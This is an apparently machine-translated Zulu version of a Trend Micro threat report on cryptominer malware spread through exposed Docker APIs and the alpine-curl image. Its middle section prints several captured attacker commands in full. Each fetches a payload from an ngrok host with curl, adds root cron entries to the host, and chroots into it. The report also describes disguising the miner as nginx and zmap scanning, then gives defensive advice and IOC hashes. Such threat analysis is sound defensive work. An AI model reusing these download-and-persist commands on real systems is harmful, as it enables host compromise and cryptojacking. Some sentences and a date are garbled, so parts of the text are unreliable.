Sihlaziye idatha eqoqwe kusetshenziswa iziqukathi ze-honeypot, esiyidalile ukuze silandelele izinsongo. Futhi sithole umsebenzi obalulekile ovela kubavukuzi abangafunwa noma abangagunyaziwe be-cryptocurrency abafakwe njengeziqukathi ezinonya kusetshenziswa isithombe esishicilelwe umphakathi ku-Docker Hub. Isithombe sisetshenziswa njengengxenye yesevisi eletha abavukuzi abanonya be-cryptocurrency.
Ukwengeza, izinhlelo zokusebenza ngamanethiwekhi afakiwe ukuze zingene ezitsheni ezivulekile ezingomakhelwane nezinhlelo zokusebenza.
Sishiya izimbiza zethu zoju njengoba zinjalo, okungukuthi, nezilungiselelo ezizenzakalelayo, ngaphandle kwezinyathelo zokuphepha noma ukufakwa okulandelayo kwesoftware eyengeziwe. Sicela uqaphele ukuthi i-Docker inezincomo zokusetha kokuqala ukugwema amaphutha nokuba sengozini okulula. Kodwa izimbiza zoju ezisetshenziswayo ziyiziqukathi, eziklanyelwe ukubona ukuhlasela okuqondiswe endaweni yokufaka iziqukathi, hhayi izinhlelo zokusebenza ezingaphakathi kweziqukathi.
Umsebenzi ongalungile otholiwe uyaphawuleka futhi ngoba awudingi ubungozi futhi futhi uzimele enguqulweni ye-Docker. Ukuthola isithombe esilungiselelwe ngokungalungile, futhi esivuliwe, sesiqukathi yikho konke abahlaseli abakudingayo ukuthelela amaseva amaningi avuliwe.
I-Docker API engavaliwe ivumela umsebenzisi ukuthi enze uhla olubanzi lwe
Ngakwesokunxele indlela yokulethwa kwe-malware. Ngakwesokudla indawo yomhlaseli, evumela ukukhishwa okukude kwezithombe.
Ukusatshalaliswa ngezwe lama-Docker API angu-3762 avulekile. Ngokusekelwe kusesho lwe-Shodan lwangomhla ka-12.02.2019/XNUMX/XNUMX
Izinketho zokuhlasela kanye nomthwalo wokukhokha
Umsebenzi omubi awutholwanga kuphela ngosizo lwezimbiza zoju. Idatha evela ku-Shodan ibonisa ukuthi inani lama-Docker APIs adaluliwe (bona igrafu yesibili) linyukile kusukela siphenye isiqukathi esingalungiselelwe kahle esisetshenziswa njengebhuloho lokusebenzisa isofthiwe yezimayini ye-Monero cryptocurrency. Ngo-Okthoba wonyaka odlule (2018, idatha yamanje
Ukuhlolwa kwezingodo zembiza yoju kwabonisa ukuthi ukusetshenziswa kwesithombe sesitsha kwakuhlobene nokusetshenziswa kwe
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Njengoba ubona, amafayela alayishiwe alandwa kuma-URL ashintsha njalo. Lawa ma-URL anedethi yokuphelelwa yisikhathi emfushane, ngakho okulayishiwe akukwazi ukulandwa ngemva kosuku lokuphelelwa yisikhathi.
Kunezinketho ezimbili zokulayisha okukhokhelwayo. Eyokuqala iyimvukuzi ye-ELF ehlanganisiwe ye-Linux (echazwa ngokuthi i-Coinminer.SH.MALXMR.ATNO) exhuma echibini lezimayini. Okwesibili umbhalo (TrojanSpy.SH.ZNETMAP.A) oklanyelwe ukuthola amathuluzi athile enethiwekhi asetshenziselwa ukuskena ububanzi benethiwekhi bese kuseshwa okuhlosiwe okusha.
Iskripthi se-dropper sisetha okuguquguqukayo okubili, okubese kusetshenziselwa ukuphakela umvukuzi we-cryptocurrency. Okuguquguqukayo kwe-HOST kuqukethe i-URL lapho amafayela anonya atholakala khona, futhi okuguquguqukayo kwe-RIP igama lefayela (empeleni, i-hashi) yomvukuzi okufanele asetshenziswe. Okuguquguqukayo kwe-HOST kushintsha njalo uma ukushintsha kwe-hashi kushintsha. Umbhalo uphinde uzame ukuhlola ukuthi abekho yini abanye abavukuzi be-cryptocurrency abasebenzayo kuseva ehlaselwe.
Izibonelo zokuguquguquka kwe-HOST ne-RIP, kanye namazwibela ekhodi asetshenziselwa ukuhlola ukuthi abekho abanye abavukuzi abasebenzayo.
Ngaphambi kokuqala umvukuzi, uqanjwa kabusha ku-nginx. Ezinye izinguqulo zalesi skripthi ziqamba kabusha umsebenzi wasezimayini kwezinye izinsiza ezisemthethweni okungenzeka zibe khona ezindaweni ze-Linux. Ngokuvamile lokhu kwanele ukudlula ukuhlola ngokumelene nohlu lwezinqubo ezisebenzayo.
Umbhalo wosesho nawo unezici. Isebenza nesevisi ye-URL efanayo ukuze ikhiphe amathuluzi adingekayo. Phakathi kwazo kukhona kanambambili we-zmap, osetshenziselwa ukuskena amanethiwekhi nokuthola uhlu lwamachweba avuliwe. Iskripthi siphinde silayishe enye inambambili esetshenziselwa ukusebenzisana namasevisi atholakele futhi yamukele izibhengezo ezivela kuzo ukuze kutholwe ulwazi olwengeziwe mayelana nesevisi etholiwe (isibonelo, inguqulo yayo).
Iskripthi siphinde sinqume kusengaphambili ububanzi obuthile benethiwekhi obuzoskenwa, kodwa lokhu kuncike enguqulweni yombhalo. Iphinde isethe amachweba okuhlosiwe avela ezinsizeni—kulokhu, i-Docker—ngaphambi kokwenza ukuskena.
Ngokushesha lapho okuhlosiwe kutholakala khona, izibhengezo zikhishwa ngokuzenzakalelayo kuzo. Umbhalo uphinde uhlunge okuhlosiwe kuye ngezinkonzo, izinhlelo zokusebenza, izingxenye noma izinkundla ezithakaselwayo: Redis, Jenkins, Drupal, MODX,
I-vector yokuhlasela iyisithombe se-Docker, njengoba singabonakala ezingxenyeni ezimbili ezilandelayo zekhodi.
Phezulu kuqanjwa kabusha kusevisi esemthethweni, futhi ngezansi ukuthi i-zmap isetshenziswa kanjani ukuskena amanethiwekhi.
Phezulu kunezinhla zenethiwekhi ezichazwe ngaphambilini, ngezansi kukhona amachweba athile okuseshwa kwezinsiza, okuhlanganisa i-Docker
Isithombe-skrini sibonisa ukuthi isithombe se-alpine-curl silandwe izikhathi ezingaphezu kwezigidi ezingu-10
Ngokusekelwe ku-Alpine Linux ne-curl, ithuluzi elisebenza kahle le-CLI lokudlulisa amafayela ngezivumelwano ezihlukahlukene, ungakha
Kubalulekile ukuqaphela ukuthi lesi sithombe (i-alpine-curl) ngokwaso asiyona into embi, kodwa njengoba ungabona ngenhla, singasetshenziswa ukwenza imisebenzi enonya. Izithombe ezifanayo ze-Docker nazo zingasetshenziswa ukwenza imisebenzi enonya. Sithinte uDocker sasebenza nabo kulolu daba.
Izincomo
Isigameko okuxoxwe ngaso kulesi sihloko siqokomisa isidingo sokucabangela ukuphepha zisuka nje, kuhlanganise nezincomo ezilandelayo:
- Kubaphathi besistimu nabathuthukisi: Njalo hlola izilungiselelo zakho ze-API ukuze wenze isiqiniseko sokuthi yonke into ilungisiwe ukuze yamukele izicelo ezivela kuseva ethile noma inethiwekhi yangaphakathi.
- Landela isimiso samalungelo amancane: qinisekisa ukuthi izithombe zesiqukathi zisayiniwe futhi ziyaqinisekiswa, khawulela ukufinyelela ezingxenyeni ezibalulekile (isevisi yokwethulwa kwesiqukathi) futhi wengeze ukubethela ekuxhumekeni kwenethiwekhi.
- Landela
izincomo futhi unike amandla izindlela zokuphepha, isb.kusuka ku-Docker futhi eyakhelwe ngaphakathiizici zokuphepha . - Sebenzisa ukuskena okuzenzakalelayo kwezikhathi zokusebenza nezithombe ukuze uthole ulwazi olwengeziwe mayelana nezinqubo ezisebenza esitsheni (isibonelo, ukuthola ukonakala noma ukucinga ubungozi). Ukulawula uhlelo lokusebenza nokuqapha ubuqotho kusiza ukulandelela izinguquko ezingavamile kumaseva, amafayela, nezindawo zesistimu.
I-Trendmicro isiza amaqembu e-DevOps akhe ngokuvikelekile, akhiphe ngokushesha, futhi aqalise noma yikuphi. I-Trend Micro
Izimpawu zokuvumelana
Ama-hashe ahlobene:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
In
Source: www.habr.com